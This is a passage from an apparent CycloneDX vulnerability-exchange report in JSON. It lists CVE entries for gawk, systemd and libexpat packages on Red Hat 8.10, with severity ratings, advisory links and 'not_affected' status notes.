          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40553",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121
      ],
      "description": "Buffer overflow vulnerability has been found in \"extension/readdir.c\" program file of gawk (ftype()\u00a0routine). This issue could be used to crash the program and potentially to achieve code execution, although the latter has not been confirmed to be feasible. It affects\u00a0gawk in versions 5.4.0 and below.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40553"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40553"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-40467"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gawk.git/commit/?id=cca0366144336b49aaa7d5d949966ce8e2c70843"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40553"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8588-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40553"
        }
      ],
      "published": "2026-07-13T13:16:37+00:00",
      "updated": "2026-07-14T01:10:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4105",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        284
      ],
      "description": "A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7299"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4105"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447262"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-4h6x-r8vx-3862"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4105"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4105"
        }
      ],
      "published": "2026-03-13T19:55:13+00:00",
      "updated": "2026-06-17T10:55:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41080",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "libexpat before 2.8.0 uses insufficient entropy, and thus hash flooding can occur via a crafted XML document.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41080"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/26/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41080"
        },
        {
          "url": "https://blog.hartwork.org/posts/expat-2-8-0-released/"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/47"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1183"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41080"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41080"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/26/1"
        }
      ],
      "published": "2026-04-16T17:16:54+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41989",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
